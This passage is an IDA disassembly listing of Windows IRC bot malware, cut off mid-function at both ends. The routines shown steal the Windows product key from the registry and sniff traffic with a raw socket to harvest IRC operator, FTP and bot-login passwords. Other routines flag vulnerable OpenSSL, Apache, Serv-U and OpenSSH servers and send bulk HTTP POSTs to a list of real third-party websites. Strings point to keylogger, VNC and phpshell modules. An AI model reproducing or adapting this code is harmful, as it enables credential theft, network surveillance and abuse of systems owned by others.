xor edx, edx
pop edi
div edi
dec esi
cmp esi, 0FFFFFFFFh
mov [ecx], al
mov eax, edx
jg short loc_425443
mov al, byte_450524[eax]
push 5
mov [ebx], al
mov eax, [ebp+arg_0]
cdq
pop ecx
dec ebx
idiv ecx
test edx, edx
jnz short loc_425487
cmp [ebp+arg_0], edx
jle short loc_425487
cmp [ebp+arg_4], edx
jz short loc_425487
mov byte ptr [ebx], 2Dh
dec ebx
loc_425487: ; CODE XREF: sub_4253C0+B7�j
; sub_4253C0+BC�j ...
dec [ebp+arg_0]
jns short loc_42543E
xor esi, esi
pop edi
inc esi
pop ebx
loc_425491: ; CODE XREF: sub_4253C0+53�j
push [ebp+var_4]
call dword_456EE8 ; RegCloseKey
loc_42549A: ; CODE XREF: sub_4253C0+29�j
mov eax, esi
pop esi
leave
retn
sub_4253C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42549F proc near ; CODE XREF: sub_40A938+145D�p
var_BC = byte ptr -0BCh
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_8C = dword ptr -8Ch
var_88 = byte ptr -88h
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0BCh
push esi
push edi
xor edi, edi
push 10h
push edi
push offset dword_6607CC
mov esi, offset off_4476F8
call sub_429690
add esp, 0Ch
lea eax, [ebp+var_9C]
mov [ebp+var_9C], 9Ch
push eax
call dword_437050 ; GetVersionExA
test eax, eax
jz loc_4255BD
push [ebp+var_94]
push [ebp+var_98]
push offset aD_D ; "%d.%d"
push 4
push esi
call sub_429AEE
add esp, 14h
cmp [ebp+var_98], 4
jnz short loc_425552
cmp [ebp+var_94], edi
jnz short loc_425532
cmp [ebp+var_8C], 1
jnz short loc_42551B
mov esi, offset a95 ; "95"
loc_42551B: ; CODE XREF: sub_42549F+75�j
cmp [ebp+var_8C], 2
jnz loc_4255BD
mov esi, offset aNt_0 ; "NT"
jmp loc_4255BD
; ---------------------------------------------------------------------------
loc_425532: ; CODE XREF: sub_42549F+6C�j
cmp [ebp+var_94], 0Ah
jnz short loc_425542
mov esi, offset a98 ; "98"
jmp short loc_4255BD
; ---------------------------------------------------------------------------
loc_425542: ; CODE XREF: sub_42549F+9A�j
cmp [ebp+var_94], 5Ah
jnz short loc_4255BD
mov esi, offset aMe_0 ; "ME"
jmp short loc_4255BD
; ---------------------------------------------------------------------------
loc_425552: ; CODE XREF: sub_42549F+64�j
cmp [ebp+var_98], 5
jnz short loc_42558A
cmp [ebp+var_94], edi
jnz short loc_42556A
mov esi, offset a2k ; "2K"
jmp short loc_4255BD
; ---------------------------------------------------------------------------
loc_42556A: ; CODE XREF: sub_42549F+C2�j
cmp [ebp+var_94], 1
jnz short loc_42557A
mov esi, offset aXp ; "XP"
jmp short loc_4255BD
; ---------------------------------------------------------------------------
loc_42557A: ; CODE XREF: sub_42549F+D2�j
cmp [ebp+var_94], 2
jnz short loc_4255BD
mov esi, offset a2k3_0 ; "2K3"
jmp short loc_4255BD
; ---------------------------------------------------------------------------
loc_42558A: ; CODE XREF: sub_42549F+BA�j
cmp [ebp+var_98], 6
jnz short loc_4255BD
cmp [ebp+var_94], edi
jnz short loc_4255AF
cmp [ebp+var_2], 1
jnz short loc_4255A8
mov esi, offset aVista_0 ; "Vista"
jmp short loc_4255BD
; ---------------------------------------------------------------------------
loc_4255A8: ; CODE XREF: sub_42549F+100�j
mov esi, offset a2008 ; "2008"
jmp short loc_4255BD
; ---------------------------------------------------------------------------
loc_4255AF: ; CODE XREF: sub_42549F+FA�j
cmp [ebp+var_94], 1
jnz short loc_4255BD
mov esi, offset a7 ; "7"
loc_4255BD: ; CODE XREF: sub_42549F+3B�j
; sub_42549F+83�j ...
lea eax, [ebp+var_BC]
push 1
push eax
call sub_4253C0
pop ecx
test eax, eax
pop ecx
jz short loc_425606
lea eax, [ebp+var_BC]
cmp [ebp+arg_8], edi
push eax
lea eax, [ebp+var_88]
push eax
push esi
push offset aUhdhc1pcv9i ; "uhdhC1pCV9i/"
push offset aSWindowsSSKey_ ; "%s Windows %s (%s) Key: %.29s"
push [ebp+arg_0]
push [ebp+arg_4]
jnz short loc_4255FF
call sub_41CD84
loc_4255FA: ; CODE XREF: sub_42549F+165�j
add esp, 1Ch
jmp short loc_42562A
; ---------------------------------------------------------------------------
loc_4255FF: ; CODE XREF: sub_42549F+154�j
call sub_41CD0E
jmp short loc_4255FA
; ---------------------------------------------------------------------------
loc_425606: ; CODE XREF: sub_42549F+130�j
cmp [ebp+arg_8], edi
push offset aUhdhc1pcv9i ; "uhdhC1pCV9i/"
push offset aSWindowsKeyNot ; "%s Windows Key not found."
push [ebp+arg_0]
push [ebp+arg_4]
jnz short loc_425622
call sub_41CD84
jmp short loc_425627
; ---------------------------------------------------------------------------
loc_425622: ; CODE XREF: sub_42549F+17A�j
call sub_41CD0E
loc_425627: ; CODE XREF: sub_42549F+181�j
add esp, 10h
loc_42562A: ; CODE XREF: sub_42549F+15E�j
pop edi
pop esi
leave
retn
sub_42549F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42562E proc near ; CODE XREF: sub_40A938+1503�p
var_88 = byte ptr -88h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 88h
lea eax, [ebp+var_4]
push esi
xor esi, esi
push eax
push 20019h
push esi
push [ebp+arg_10]
mov [ebp+var_4], esi
mov [ebp+var_8], 80h
push [ebp+arg_C]
call dword_437004 ; RegOpenKeyExA
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_88]
push eax
push esi
push esi
push [ebp+arg_14]
push [ebp+var_4]
call dword_437028 ; RegQueryValueExA
test eax, eax
jnz short loc_4256AB
lea eax, [ebp+var_88]
cmp [ebp+arg_8], esi
push eax
push offset aUhdhc1pcv9i ; "uhdhC1pCV9i/"
push offset aSS_ ; "%s %s."
push [ebp+arg_0]
push [ebp+arg_4]
jnz short loc_42569A
call sub_41CD84
jmp short loc_42569F
; ---------------------------------------------------------------------------
loc_42569A: ; CODE XREF: sub_42562E+63�j
call sub_41CD0E
loc_42569F: ; CODE XREF: sub_42562E+6A�j
add esp, 14h
push [ebp+var_4]
call dword_437000 ; RegCloseKey
loc_4256AB: ; CODE XREF: sub_42562E+47�j
pop esi
leave
retn
sub_42562E endp
; =============== S U B R O U T I N E =======================================
sub_4256AE proc near ; CODE XREF: sub_425A1B+198�p
; sub_425A1B+1BC�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_6607DC, eax
mov eax, offset dword_6607DC
retn
sub_4256AE endp
; =============== S U B R O U T I N E =======================================
sub_4256BD proc near ; CODE XREF: sub_425A1B+226�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset dword_443F04
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jz short loc_4256D7
loc_4256D3: ; CODE XREF: sub_4256BD+29�j
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4256D7: ; CODE XREF: sub_4256BD+14�j
push offset dword_443EF4
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_4256D3
push offset aSh ; "!* SH"
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jz short loc_4256FE
loc_4256F9: ; CODE XREF: sub_4256BD+50�j
; sub_4256BD+61�j ...
xor eax, eax
pop esi
inc eax
retn
; ---------------------------------------------------------------------------
loc_4256FE: ; CODE XREF: sub_4256BD+3A�j
push offset aUdp ; "!* UDP"
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_4256F9
push offset aPan ; "!* PAN"
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_4256F9
push offset aPush ; "!* PUSH"
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_4256F9
push offset aWget ; "wget"
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_4256F9
push offset aPhpshell ; "phpshell"
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_4256F9
push offset aMain_1 ; "[MAIN]:"
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_4256F9
push offset aScan ; "[SCAN]:"
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_4256F9
push offset aFtp_0 ; "[FTP]:"
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz loc_4256F9
push offset aTftp_0 ; "[TFTP]:"
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz loc_4256F9
push offset aKeylogger ; "[KEYLOGGER]:"
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz loc_4256F9
push offset aVnc ; "[VNC]:"
push esi
call sub_42ADD0
neg eax
pop ecx
sbb eax, eax
pop ecx
neg eax
pop esi
retn
sub_4256BD endp
; =============== S U B R O U T I N E =======================================
sub_4257C9 proc near ; CODE XREF: sub_425A1B:loc_425C6E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset aLtlec18us5q0 ; "LTLec18US5q0"
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jz short loc_4257E3
loc_4257DF: ; CODE XREF: sub_4257C9+29�j
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4257E3: ; CODE XREF: sub_4257C9+14�j
push offset dword_443F04
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_4257DF
push offset dword_443EF4
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jz short loc_42580A
loc_425805: ; CODE XREF: sub_4257C9+50�j
; sub_4257C9+61�j ...
xor eax, eax
pop esi
inc eax
retn
; ---------------------------------------------------------------------------
loc_42580A: ; CODE XREF: sub_4257C9+3A�j
push offset aPass_0 ; "PASS "
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_425805
push offset aIrcOperator ; "IRC Operator"
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_425805
push offset aNowANetworkAdm ; "now a network administrator"
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_425805
push offset aPrivmsg ; "PRIVMSG"
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_425805
push offset aJoin ; "JOIN"
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_425805
push offset aOper ; "OPER"
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_425805
push offset aPong ; "PONG"
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_425805
push offset aPing ; "PING"
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz loc_425805
push offset aUserhost ; "USERHOST"
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz loc_425805
push offset aNotice ; "NOTICE"
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz loc_425805
push offset aTopic_0 ; "TOPIC"
push esi
call sub_42ADD0
neg eax
pop ecx
sbb eax, eax
pop ecx
neg eax
pop esi
retn
sub_4257C9 endp
; =============== S U B R O U T I N E =======================================
sub_4258D5 proc near ; CODE XREF: sub_425A1B:loc_425C98�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset dword_443F04
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jz short loc_4258EF
loc_4258EB: ; CODE XREF: sub_4258D5+29�j
; sub_4258D5+3A�j ...
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4258EF: ; CODE XREF: sub_4258D5+14�j
push offset dword_443EF4
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_4258EB
push offset off_4506BC
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_4258EB
push offset aMail ; "Mail"
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_4258EB
push offset aUser_1 ; "USER "
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jz short loc_425938
xor eax, eax
pop esi
inc eax
retn
; ---------------------------------------------------------------------------
loc_425938: ; CODE XREF: sub_4258D5+5C�j
push offset aPass_0 ; "PASS "
push esi
call sub_42ADD0
neg eax
pop ecx
sbb eax, eax
pop ecx
neg eax
pop esi
retn
sub_4258D5 endp
; =============== S U B R O U T I N E =======================================
sub_42594D proc near ; CODE XREF: sub_425A1B:loc_425CC2�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset dword_443F04
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jz short loc_425967
loc_425963: ; CODE XREF: sub_42594D+29�j
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_425967: ; CODE XREF: sub_42594D+14�j
push offset dword_443EF4
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_425963
push offset a_bot ; "_BOT"
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jz short loc_42598E
xor eax, eax
pop esi
inc eax
retn
; ---------------------------------------------------------------------------
loc_42598E: ; CODE XREF: sub_42594D+3A�j
push offset a_bot_login ; "_BOT_LOGIN"
push esi
call sub_42ADD0
neg eax
pop ecx
sbb eax, eax
pop ecx
neg eax
pop esi
retn
sub_42594D endp
; =============== S U B R O U T I N E =======================================
sub_4259A3 proc near ; CODE XREF: sub_425A1B:loc_425CEC�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset dword_443F04
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jz short loc_4259BD
loc_4259B9: ; CODE XREF: sub_4259A3+29�j
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4259BD: ; CODE XREF: sub_4259A3+14�j
push offset dword_443EF4
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_4259B9
push offset aOpenssl0_9_6 ; "OpenSSL/0.9.6"
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jz short loc_4259E4
loc_4259DF: ; CODE XREF: sub_4259A3+50�j
; sub_4259A3+61�j
xor eax, eax
pop esi
inc eax
retn
; ---------------------------------------------------------------------------
loc_4259E4: ; CODE XREF: sub_4259A3+3A�j
push offset aApache1_3 ; "Apache/1.3"
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_4259DF
push offset aServUFtpServer ; "Serv-U FTP Server"
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_4259DF
push offset aOpenssh_2 ; "OpenSSH_2"
push esi
call sub_42ADD0
neg eax
pop ecx
sbb eax, eax
pop ecx
neg eax
pop esi
retn
sub_4259A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425A1B proc near ; DATA XREF: sub_40A938+FFC�o
var_4FC = byte ptr -4FCh
var_4FB = byte ptr -4FBh
var_3FC = byte ptr -3FCh
var_3F3 = byte ptr -3F3h
var_3F0 = dword ptr -3F0h
var_3EC = dword ptr -3ECh
var_3E8 = dword ptr -3E8h
var_3D4 = byte ptr -3D4h
var_1FC = byte ptr -1FCh
var_17C = byte ptr -17Ch
var_FC = dword ptr -0FCh
var_F8 = byte ptr -0F8h
var_78 = dword ptr -78h
var_38 = byte ptr -38h
var_28 = byte ptr -28h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 4FCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 31h
mov esi, eax
pop ecx
lea edi, [ebp+var_FC]
rep movsd
xor esi, esi
push 3Fh
inc esi
xor ebx, ebx
mov [eax+0BCh], esi
mov eax, [ebp+var_FC]
mov [ebp+arg_0], eax
pop ecx
xor eax, eax
lea edi, [ebp+var_4FB]
mov [ebp+var_4FC], bl
push 0FFh
rep stosd
stosw
lea eax, [ebp+var_4FC]
mov [ebp+var_24], 2
push eax
mov [ebp+var_22], bx
mov [ebp+var_20], ebx
call dword_456F2C ; gethostname
lea eax, [ebp+var_4FC]
push eax
call dword_456FB4 ; gethostbyname
movsx ecx, word ptr [eax+0Ah]
mov eax, [eax+0Ch]
push ecx
push dword ptr [eax]
lea eax, [ebp+var_10]
push eax
call sub_429350
mov eax, [ebp+var_10]
add esp, 0Ch
mov [ebp+var_20], eax
push ebx
push 3
push 2
call dword_456FB0 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_C], edi
jnz short loc_425ACD
push [ebp+var_78]
call sub_42355A
pop ecx
push ebx
call dword_437170 ; ExitThread
loc_425ACD: ; CODE XREF: sub_425A1B+A0�j
lea eax, [ebp+var_24]
push 10h
push eax
push edi
call dword_456F4C ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_425AF6
push edi
call dword_456FD0 ; closesocket
push [ebp+var_78]
call sub_42355A
pop ecx
push ebx
call dword_437170 ; ExitThread
loc_425AF6: ; CODE XREF: sub_425A1B+C2�j
push ebx
lea eax, [ebp+var_28]
push ebx
push eax
push ebx
push ebx
lea eax, [ebp+var_14]
push 4
push eax
push 98000001h
push edi
mov [ebp+var_14], esi
call dword_456EA0 ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_425B2F
push edi
call dword_456FD0 ; closesocket
push [ebp+var_78]
call sub_42355A
pop ecx
push ebx
call dword_437170 ; ExitThread
loc_425B2F: ; CODE XREF: sub_425A1B+FB�j
mov ecx, [ebp+arg_0]
call sub_41DA92
push eax
lea eax, [ebp+var_38]
push eax
call dword_4370A4 ; lstrcpyA
mov ecx, [ebp+arg_0]
call sub_41DA9A
test al, al
jz loc_425D36
mov esi, offset aS_5 ; "%s"
loc_425B57: ; CODE XREF: sub_425A1B+315�j
mov edi, 200h
lea eax, [ebp+var_3FC]
push edi
push ebx
push eax
call sub_429690
add esp, 0Ch
lea eax, [ebp+var_3FC]
push ebx
push edi
push eax
push [ebp+var_C]
call dword_456F38 ; recv
cmp [ebp+var_3F3], 6
jnz loc_425D26
push [ebp+var_3E8]
call dword_456E10 ; ntohs
push [ebp+var_3E8+2]
movzx edi, ax
call dword_456E10 ; ntohs
push [ebp+var_3F0]
movzx eax, ax
mov [ebp+var_4], eax
call sub_4256AE
add esp, 4
push dword ptr [eax]
call dword_456FBC ; inet_ntoa
push eax
lea eax, [ebp+var_17C]
push esi
push eax
call sub_429A33
push [ebp+var_3EC]
call sub_4256AE
add esp, 10h
push dword ptr [eax]
call dword_456FBC ; inet_ntoa
push eax
lea eax, [ebp+var_1FC]
push esi
push eax
call sub_429A33
lea eax, [ebp+var_3D4]
mov [ebp+var_8], ebx
push eax
call sub_4292D0
add esp, 10h
test eax, eax
jbe short loc_425C3A
loc_425C0B: ; CODE XREF: sub_425A1B+21D�j
mov eax, [ebp+var_8]
lea eax, [ebp+eax+var_3D4]
cmp byte ptr [eax], 0Dh
jnz short loc_425C1D
mov byte ptr [eax], 20h
loc_425C1D: ; CODE XREF: sub_425A1B+1FD�j
cmp byte ptr [eax], 0Ah
jnz short loc_425C25
mov byte ptr [eax], 20h
loc_425C25: ; CODE XREF: sub_425A1B+205�j
inc [ebp+var_8]
lea eax, [ebp+var_3D4]
push eax
call sub_4292D0
cmp [ebp+var_8], eax
pop ecx
jb short loc_425C0B
loc_425C3A: ; CODE XREF: sub_425A1B+1EE�j
lea eax, [ebp+var_3D4]
push eax
call sub_4256BD
test eax, eax
pop ecx
lea eax, [ebp+var_3D4]
push eax
jz short loc_425C6E
push [ebp+var_4]
lea eax, [ebp+var_1FC]
push eax
lea eax, [ebp+var_17C]
push edi
push eax
push offset unk_4507A0
jmp loc_425D14
; ---------------------------------------------------------------------------
loc_425C6E: ; CODE XREF: sub_425A1B+235�j
call sub_4257C9
test eax, eax
pop ecx
lea eax, [ebp+var_3D4]
push eax
jz short loc_425C98
push [ebp+var_4]
lea eax, [ebp+var_1FC]
push eax
lea eax, [ebp+var_17C]
push edi
push eax
push offset unk_45077C
jmp short loc_425D14
; ---------------------------------------------------------------------------
loc_425C98: ; CODE XREF: sub_425A1B+262�j
call sub_4258D5
test eax, eax
pop ecx
lea eax, [ebp+var_3D4]
push eax
jz short loc_425CC2
push [ebp+var_4]
lea eax, [ebp+var_1FC]
push eax
lea eax, [ebp+var_17C]
push edi
push eax
push offset unk_450758
jmp short loc_425D14
; ---------------------------------------------------------------------------
loc_425CC2: ; CODE XREF: sub_425A1B+28C�j
call sub_42594D
test eax, eax
pop ecx
lea eax, [ebp+var_3D4]
push eax
jz short loc_425CEC
push [ebp+var_4]
lea eax, [ebp+var_1FC]
push eax
lea eax, [ebp+var_17C]
push edi
push eax
push offset unk_450734
jmp short loc_425D14
; ---------------------------------------------------------------------------
loc_425CEC: ; CODE XREF: sub_425A1B+2B6�j
call sub_4259A3
test eax, eax
pop ecx
jz short loc_425D26
lea eax, [ebp+var_3D4]
push eax
lea eax, [ebp+var_1FC]
push [ebp+var_4]
push eax
lea eax, [ebp+var_17C]
push edi
push eax
push offset dword_450710
loc_425D14: ; CODE XREF: sub_425A1B+24E�j
; sub_425A1B+27B�j ...
lea eax, [ebp+var_F8]
push eax
push [ebp+arg_0]
call sub_41CD84
add esp, 20h
loc_425D26: ; CODE XREF: sub_425A1B+16B�j
; sub_425A1B+2D9�j
mov ecx, [ebp+arg_0]
call sub_41DA9A
test al, al
jnz loc_425B57
loc_425D36: ; CODE XREF: sub_425A1B+131�j
push [ebp+var_C]
call dword_456FD0 ; closesocket
push [ebp+var_78]
call sub_42355A
pop ecx
push ebx
call dword_437170 ; ExitThread
sub_425A1B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425D4F proc near ; CODE XREF: sub_425F31+168�p
; sub_425F31+182�p ...
var_38 = dword ptr -38h
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_4292D0
cmp eax, 9Fh
pop ecx
ja loc_425F2D
push 10h
lea eax, [ebp+var_28]
push 0
push eax
call sub_429690
push [ebp+arg_0]
mov [ebp+var_28], 2
call sub_41E326
add esp, 10h
cmp eax, 0FFFFFFFFh
mov [ebp+var_24], eax
jz loc_425F2D
push 50h
call dword_456F18 ; ntohs
push 6
push 1
push 2
mov [ebp+var_26], ax
call dword_456FB0 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_425F2D
lea ecx, [ebp+var_28]
push 10h
push ecx
push eax
call dword_456E9C ; connect
cmp eax, 0FFFFFFFFh
jz loc_425F2D
push 32003h
call sub_4296E8
mov ebx, dword_437184
mov edi, eax
pop ecx
mov [ebp+var_10], edi
call ebx ; dword_437184
push eax
call sub_429ABF
call sub_429ACC
cdq
mov ecx, 0FFh
mov [esp+38h+var_38], 32001h
idiv ecx
push 0
push edi
movsx esi, dl
call sub_429690
push 32000h
push esi
push edi
call sub_429690
push edi
call sub_4292D0
push 323EAh
mov [ebp+var_8], eax
call sub_4296E8
push [ebp+var_8]
mov esi, eax
push [ebp+arg_0]
push offset aPostHttp1_1Hos ; "POST / HTTP/1.1\r\nHost: %s\r\nContent-Leng"...
push esi
call sub_429A33
add esp, 30h
push edi
mov edi, dword_437090
push esi
call edi ; dword_437090
push offset asc_4476B0 ; "\r\n"
push esi
call edi ; dword_437090
push esi
call sub_4292D0
mov edi, eax
pop ecx
mov [ebp+var_8], edi
call ebx ; dword_437184
mov dword ptr [ebp+var_18+4], eax
xor eax, eax
test edi, edi
mov [ebp+arg_0], eax
jbe short loc_425EAB
mov [ebp+var_C], edi
mov edi, 400h
jmp short loc_425E7B
; ---------------------------------------------------------------------------
loc_425E78: ; CODE XREF: sub_425D4F+15A�j
mov eax, [ebp+arg_0]
loc_425E7B: ; CODE XREF: sub_425D4F+127�j
mov ecx, [ebp+var_8]
push 0
sub ecx, eax
add eax, esi
cmp ecx, edi
jnb short loc_425E8D
push [ebp+var_C]
jmp short loc_425E8E
; ---------------------------------------------------------------------------
loc_425E8D: ; CODE XREF: sub_425D4F+137�j
push edi
loc_425E8E: ; CODE XREF: sub_425D4F+13C�j
push eax
push [ebp+var_4]
call dword_456F6C ; send
cmp eax, 0FFFFFFFFh
jz short loc_425F14
add [ebp+arg_0], edi
sub [ebp+var_C], edi
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_8]
jb short loc_425E78
loc_425EAB: ; CODE XREF: sub_425D4F+11D�j
call ebx ; dword_437184
sub eax, dword ptr [ebp+var_18+4]
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
fmul flt_437354
fst [ebp+arg_0]
fcomp flt_437350
fnstsw ax
test ah, 44h
jp short loc_425ED5
fld1
fstp [ebp+arg_0]
loc_425ED5: ; CODE XREF: sub_425D4F+17F�j
push [ebp+var_4]
call dword_456FD0 ; closesocket
push [ebp+var_10]
call sub_429822
push esi
call sub_429822
mov eax, [ebp+var_8]
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
pop ecx
fild [ebp+var_18]
pop ecx
fdiv [ebp+arg_0]
fmul flt_43734C
fmul flt_437348
call sub_42A910
loc_425F0F: ; CODE XREF: sub_425D4F+1E0�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_425F14: ; CODE XREF: sub_425D4F+14C�j
push [ebp+var_4]
call dword_456FD0 ; closesocket
push [ebp+var_10]
call sub_429822
push esi
call sub_429822
pop ecx
pop ecx
loc_425F2D: ; CODE XREF: sub_425D4F+17�j
; sub_425D4F+41�j ...
xor eax, eax
jmp short loc_425F0F
sub_425D4F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425F31 proc near ; DATA XREF: sub_40A938+166C�o
var_134 = dword ptr -134h
var_130 = byte ptr -130h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 134h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 26h
mov esi, eax
pop ecx
lea edi, [ebp+var_134]
rep movsd
mov dword ptr [eax+94h], 1
mov eax, [ebp+var_134]
mov [ebp+arg_0], eax
mov [ebp+var_4], 3
mov [ebp+var_9C], offset aWww_schlund_ne ; "www.schlund.net"
mov [ebp+var_98], offset aWww_utwente_nl ; "www.utwente.nl"
mov [ebp+var_94], offset aWww_news_nl ; "www.news.nl"
mov [ebp+var_90], offset aWww_volkskrant ; "www.volkskrant.nl"
mov [ebp+var_8C], offset aVerio_fr ; "verio.fr"
mov [ebp+var_88], offset aWww_univAngers ; "www.univ-angers.fr"
mov [ebp+var_84], offset aWww_uniTuebing ; "www.uni-tuebingen.de"
mov [ebp+var_80], offset aWww_rollingsto ; "www.rollingstone.de"
mov [ebp+var_7C], offset aWww_rtv_de ; "www.rtv.de"
mov [ebp+var_78], offset aWww_1und1_de ; "www.1und1.de"
mov [ebp+var_74], offset aWww_switch_ch ; "www.switch.ch"
mov [ebp+var_70], offset aWww_hon_ch ; "www.hon.ch"
mov [ebp+var_6C], offset aWww_epfl_ch ; "www.epfl.ch"
mov [ebp+var_68], offset aWww_supergames ; "www.supergames.cz"
mov [ebp+var_64], offset aWww_nintendoEu ; "www.nintendo-europe.com"
mov [ebp+var_60], offset aWww_google_com ; "www.google.com"
mov [ebp+var_5C], offset aWww_xo_net ; "www.xo.net"
mov [ebp+var_58], offset aWww_stanford_e ; "www.stanford.edu"
mov [ebp+var_54], offset aWww_nocster_co ; "www.nocster.com"
mov [ebp+var_50], offset aWww_rit_edu ; "www.rit.edu"
mov [ebp+var_4C], offset aWww_cogentco_c ; "www.cogentco.com"
mov [ebp+var_48], offset aWww_burst_net ; "www.burst.net"
mov [ebp+var_44], offset aWww_level3_com ; "www.level3.com"
